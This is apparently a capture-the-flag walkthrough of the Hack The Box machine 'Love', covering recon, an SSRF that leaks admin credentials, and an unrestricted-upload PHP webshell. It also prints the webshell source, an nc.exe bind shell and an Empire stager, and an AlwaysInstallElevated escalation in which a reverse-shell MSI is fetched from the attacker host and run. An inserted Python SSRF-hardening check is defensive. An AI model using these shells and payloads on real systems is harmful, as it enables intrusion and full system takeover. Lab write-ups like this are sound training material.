Love

Really interesting box. We picked up a couple of new things and methods here. So sit tight and read through. Enjoy!

RECON PHASE

NMAP

As usual, we enumerate our target’s services.

# nmap -sV -sC -p- love.htb -oA love
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 04:35 EDT
Stats: 0:02:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 94.74% done; ETC: 04:37 (0:00:05 remaining)
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.050s latency).
Not shown: 65516 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/ssl      Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-08-05T09:05:25+00:00; +26m04s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Network Distance: 2 hops
Service Info: Hosts: LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 26m03s, deviation: 0s, median: 26m03s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-08-05T09:05:12
|_  start_date: N/A

NESSUS Scan

First, I ran a Nessus port scan to cross-check the nmap result and weed out false positives.

Then I ran a Basic Network Scan. It reported several vulnerabilities, which will be analysed in the exploit phase.

Manual Recon of the Attack Surface

Port 80 HTTP
We have a login form on the index page of Love's web service. I tested the input fields with special characters and got an error page that leaks some useful information:

  • Server: Apache 2.4.46
  • PHP 7.3.27
  • Windows x64
  • OpenSSL 1.1.1j
  • The error also leaks the filesystem path of the web root (under C:\xampp\htdocs), i.e. where the application lives on the server.

Port 5000 HTTP
We don't have permission to see the website:
# curl 10.10.10.239:5000
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 10.10.10.239 Port 5000</address>
</body></html>
Port 443 HTTPS

Port 443 returns 403 Forbidden for love.htb, but the certificate in the nmap output names staging.love.htb, and a "staging" host usually means a site still under development. Add staging.love.htb to /etc/hosts (pointing at 10.10.10.239) so that our requests carry that Host name and Apache serves the staging virtual host.

I poked the input on the staging site to test its input validation, and then it hit me: the input is a URL that the server fetches on our behalf, so the server itself can probably reach port 5000. Port 5000 is forbidden to us from outside, presumably by a client-address restriction, but a request the server makes to http://127.0.0.1:5000 originates from loopback and gets through. That is a server-side request forgery (SSRF), and the response handed us the admin credentials:

Vote Admin Creds admin: @LoveIsInTheAir!!!!
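The server-side fetch reaching port 5000 is the SSRF in a nutshell: the access control on that port judges the client address, and a request the web server makes to itself comes from 127.0.0.1. As an added example (not code from this page or from the voting application on the box), here is the unsafe "fetch this URL" pattern next to a hardened target check that rejects the loopback, shorthand and private-address forms an attacker would try. The resolver table is constructed sample data so the file runs offline; the example.com address in it is a stand-in for any public IP.

```python
"""Added example (not code from the Love box or its voting application): the
unsafe 'fetch this URL for me' pattern next to a hardened target check.
The resolver table used when running this file is constructed sample data."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def fetch_unsafe(url, opener):
    """The vulnerable shape: the user's URL goes straight to the HTTP client.
    The request leaves from the server itself, so http://127.0.0.1:5000 reaches
    a port that answers 403 to every external client."""
    return opener(url)


def resolve_host(host, resolver):
    """Map a URL host to the IP address the server would actually connect to."""
    try:                                   # IPv6 or plain IPv4 literal
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:                                   # IPv4 shorthand such as "127.1";
        packed = socket.inet_aton(host)    # glibc also takes decimal/hex forms
        return ipaddress.ip_address(socket.inet_ntoa(packed))
    except OSError:
        pass
    return ipaddress.ip_address(resolver(host))   # a real name: ask DNS


def is_internal(ip):
    """Loopback, RFC 1918/ULA, link-local (cloud metadata), 0.0.0.0 and
    IPv4-mapped IPv6 all count as internal."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)


def check_target(url, resolver=socket.gethostbyname):
    """Return (ok, detail): ok only for http(s) to a public address."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "no host in URL"
    try:
        ip = resolve_host(parts.hostname, resolver)
    except (ValueError, OSError) as exc:
        return False, f"cannot resolve {parts.hostname}: {exc}"
    if is_internal(ip):
        return False, f"{parts.hostname} resolves to internal address {ip}"
    return True, str(ip)


def fetch_hardened(url, opener, resolver=socket.gethostbyname):
    """Refuse anything that is not http(s) to a public address. Caveat: checking
    by name and then connecting by name leaves a DNS-rebinding window; connect
    to the checked IP and pass the Host header explicitly in production code."""
    ok, detail = check_target(url, resolver)
    if not ok:
        raise ValueError(f"refusing to fetch {url}: {detail}")
    return opener(url)


def demo_resolver(name):
    """Constructed lookup table so the example runs offline."""
    table = {"localhost": "127.0.0.1", "staging.love.htb": "10.10.10.239",
             "example.com": "93.184.216.34"}
    if name not in table:
        raise OSError(f"no such host: {name}")
    return table[name]


if __name__ == "__main__":
    probes = ["http://127.0.0.1:5000/", "http://localhost:5000/", "http://127.1:5000/",
              "http://0.0.0.0:5000/", "http://[::1]:5000/", "http://[::ffff:127.0.0.1]:5000/",
              "http://staging.love.htb/", "file:///C:/xampp/htdocs/", "http://example.com/"]
    for u in probes:
        print(f"{u:40} -> {check_target(u, demo_resolver)}")
```

The point of resolving before classifying is that a blocklist on the string "127.0.0.1" is useless: localhost, 127.1, 0.0.0.0, [::1] and [::ffff:127.0.0.1] all land on the same box, and a hostname under the attacker's control can resolve to loopback too.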
Port 445, 139 SMB
We know from our initial scan that SMB is running. Let's identify the host and OS behind it:
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.239:445      - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{781dd960-f30d-4aa0-b1c5-efbe7902f2d9}) (authentication domain:LOVE)
[+] 10.10.10.239:445      -   Host is running Windows 10 Pro (build:19042) (name:LOVE)
[*] 10.10.10.239:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Dirbuster Output

Our directory enumeration revealed an admin login panel.

Exploit Phase

We have credentials and an admin panel. Let's try them:
admin:@LoveIsInTheAir!!!!

First, we need to create a Position in order to create a candidate. On the Candidates page we can upload a photo when creating one, and the upload is not restricted to image files: whatever we upload is stored under the web root in /images/, where Apache will happily execute PHP.

I uploaded a simple and stable webshell, taken from joswr1ght's GitHub (easy-simple-php-webshell). It runs whatever is passed in the cmd GET parameter through PHP's system():

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

To use the shell, we browse to the /images/ directory and open the uploaded file; the form submits the command as ?cmd=...:

Now let's get a proper shell, in this case a bind shell. First, I upload nc.exe (shipped with Kali under /usr/share/windows-resources/binaries/) through the same image upload into the images directory. Next, I use the webshell to run nc.exe -lvp 1234 -e cmd.exe, so that nc listens on the target and hands cmd.exe to whoever connects. From Kali we connect to port 1234:

# nc 10.10.10.239 1234
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>

Privilege Escalation

System information

systeminfo tells us the OS name and build:

C:\tmp>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042


C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

Which users exist on the system, and what groups is our user in?

C:\tmp>net users
net users

User accounts for \\LOVE

-------------------------------------------------------------------------------
admin123                 Administrator            DefaultAccount           
Guest                    Phoebe                   WDAGUtilityAccount       
The command completed successfully.

C:\tmp>net user phoebe
net user phoebe
User name                    Phoebe
Full Name                    Phoebe
Comment                      Workstation Power User
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/12/2021 12:54:30 PM
Password expires             Never
Password changeable          4/12/2021 12:54:30 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   8/5/2021 6:09:49 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users                
Global Group memberships     *None                 
The command completed successfully.

net user truncates group names, so *Remote Management Use*Users reads as Remote Management Users and Users. Together with WinRM open on 5985/5986, that means Phoebe's password alone would be enough for a WinRM session; we already have a shell as her, though, and do not know the password.

Setup Empire

In the following lines I did the following:

  1. Created an http listener, renamed it "love" and started it.
  2. Went back to the listeners menu and listed the active listeners to check it was running.
  3. Created a windows/launcher_bat stager, set Delete to False so the .bat does not delete itself after it runs, pointed it at the love listener and executed it, which wrote the stager to /tmp/launcher.bat.
  4. Uploaded launcher.bat through the web application into the images directory and ran it from the existing shell.
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name love
(Empire: listeners/http) > execute
[*] Starting listener 'love'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!

(Empire: listeners/http) > back
(Empire: listeners) > list

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  love              http            http://10.10.14.3:80                 5/0.0                      


(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Delete False
(Empire: stager/windows/launcher_bat) > set Listener love
(Empire: stager/windows/launcher_bat) > execute
[*] Stager output written out to: /tmp/launcher.bat
(Empire: stager/windows/launcher_bat) > 
[*] Sending POWERSHELL stager (stage 1) to 10.10.10.239                                                                                                                                                                                      
[*] New agent TBVR8X2S checked in                                                                                                                                                                                                            
[+] Initial agent TBVR8X2S from 10.10.10.239 now active (Slack)                                                                                                                                                                              
[*] Sending agent (stage 2) to TBVR8X2S at 10.10.10.239
(Empire: stager/windows/launcher_bat) > agents

[*] Active agents:                                                                                                                                                                                                                           

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener                                                                                                      
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------                                                                                              
 TBVR8X2S ps 10.10.10.239    LOVE              LOVE\Phoebe             powershell         6192   5/0.0    2021-08-09 12:04:57  love                                                                                                          

To interact with it easily, rename the agent and then type interact <name>:

(Empire: stager/windows/launcher_bat) > agents

[*] Active agents:                                                                                                                                                                                                                           

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener                                                                                                      
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------                                                                                              
 TBVR8X2S ps 10.10.10.239    LOVE              LOVE\Phoebe             powershell         6192   5/0.0    2021-08-09 12:04:57  love                                                                                                          
(Empire: agents) > rename TBVR8X2S windows10
(Empire: agents) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
 windows1 ps 10.10.10.239    LOVE              LOVE\Phoebe             powershell         6192   5/0.0    2021-08-09 12:09:25  love            

(Empire: agents) > interact windows10
(Empire: windows10) > 

Using PowerUp.ps1

#FINDINGS#
(Empire: powershell/privesc/powerup/allchecks) > run
[*] Tasked TBVR8X2S to run TASK_CMD_JOB
[*] Agent TBVR8X2S tasked with task ID 4
[*] Tasked agent windows10 to run module powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > 
Job started: 1P6W8C

[*] Running Invoke-AllChecks                                                                                                                                                                                                                

[*] Checking if user is in a local group with administrative privileges...                                                                                                                                                                  

[*] Checking for unquoted service paths...                                                                                                                                                                                                  

[*] Checking service executable and argument permissions...         

ServiceName                     : edgeupdate                                                                                                                                                                                                
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc                                                                                                                                
ModifiableFile                  : C:\                                                                                                                                                                                                       
ModifiableFilePermissions       : AppendData/AddSubdirectory                                                                                                                                                                                
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users                                                                                                                                                                          
StartName                       : LocalSystem                                                                                                                                                                                               
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'                                                                                                                                                                  
CanRestart                      : False                                                                                                                                                               

ServiceName                     : edgeupdate                                                                                                                                                                                                
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc                                                                                                                                
ModifiableFile                  : C:\                                                                                                                                                                                                       
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}                                                                                                                                                       
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users                                                                                                                                                                          
StartName                       : LocalSystem                                                                                                                                                                                               
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'                                                                                                                                                                  
CanRestart                      : False         



ServiceName                     : edgeupdatem                                                                                                                                                                                               
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc                                                                                                                             
ModifiableFile                  : C:\                                                                                                                                                                                                       
ModifiableFilePermissions       : AppendData/AddSubdirectory                                                                                                                                                                                
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users                                                                                                                                                                          
StartName                       : LocalSystem                                                                                                                                                                                               
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'                                                                                                                                                                 
CanRestart                      : False       




ServiceName                     : edgeupdatem                                                                                                                                                                                               
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc                                                                                                                             
ModifiableFile                  : C:\                                                                                                                                                                                                       
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}                                                                                                                                                       
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users                                                                                                                                                                          
StartName                       : LocalSystem                                                                                                                                                                                               
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'                                                                                                                                                                 
CanRestart                      : False  


[*] Checking for AlwaysInstallElevated registry key...                                                                                                                                                                                      
AbuseFunction : Write-UserAddMSI                                                                                                                                                                                                            
[*] Checking %PATH% for potentially hijackable DLL locations...                                                                                                                                                                             
ModifiablePath    : C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps                                                                                                                                                                     
IdentityReference : LOVE\Phoebe                                                                                                                                                                                                             
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}                                                                                                                                                                   
%PATH%            : C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps                                                                                                                                                                     
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'                                       

I tried a couple of times to hijack the DLL without success, even though I did it correctly; perhaps it needs some user interaction or some requirement that is not met. That fits the findings: Write-HijackDll targets wlbsctrl.dll, which is only loaded when the IKEEXT service starts, and the edgeupdate/edgeupdatem entries report CanRestart False with C:\ as the "modifiable file" (merely the right of Authenticated Users to create directories there), so none of these fire from our shell without a service restart or reboot. I then enumerated further with winPEAS, which again flagged AlwaysInstallElevated, the finding PowerUp reported above.

A quick Google search shows how to exploit this. Windows Installer runs a package with SYSTEM privileges when AlwaysInstallElevated is set to 1 under both HKLM and HKCU in SOFTWARE\Policies\Microsoft\Windows\Installer, so any .msi we can run becomes SYSTEM. First, set up a listener to catch the connection. Then build a reverse-shell package with msfvenom (output format msi), serve it from Kali, pull it onto the target and run it with msiexec:

C:\Users\Phoebe\Desktop>curl http://10.10.14.3:8888/reverse.msi -o alwaysinstallelevated.msi
curl http://10.10.14.3:8888/reverse.msi -o alwaysinstallelevated.msi
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  156k  100  156k    0     0   156k      0  0:00:01 --:--:--  0:00:01  500k

C:\Users\Phoebe\Desktop>msiexec /quiet /qn /i alwaysinstallelevated.msi

msiexec /quiet /qn /i alwaysinstallelevated.msi
# nc -nlvp 4321
listening on [any] 4321 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.239] 58312
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>

We did it bois.
